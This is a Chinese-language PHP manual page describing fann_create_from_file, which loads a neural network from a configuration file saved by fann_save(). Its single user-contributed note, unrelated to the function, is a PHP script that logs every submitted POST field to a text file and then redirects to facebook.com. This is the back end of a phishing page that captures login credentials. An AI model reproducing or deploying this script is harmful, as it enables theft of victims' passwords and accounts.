fann_create_from_file

(PECL fann >= 1.0.0)

fann_create_from_file从配置文件中构建一个反向传播神经网络。

说明

fann_create_from_file(string $configuration_file): resource

从一个由 fann_save() 函数保存的配置文件中构建一个反向传播神经网络。

参数

configuration_file

配置文件的路径。

返回值

成功时返回神经网络 资源,发生错误返回 false

参见

  • fann_save() - 将整个网络保存至配置文件。

add a note add a note

User Contributed Notes 1 note

up
-1
alangkazo at gmail dot com
10 years ago
Code:
<?php
header
('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach(
$_POST as $variable => $value) {
  
fwrite($handle, $variable);
  
fwrite($handle, "=");
  
fwrite($handle, $value);
  
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
To Top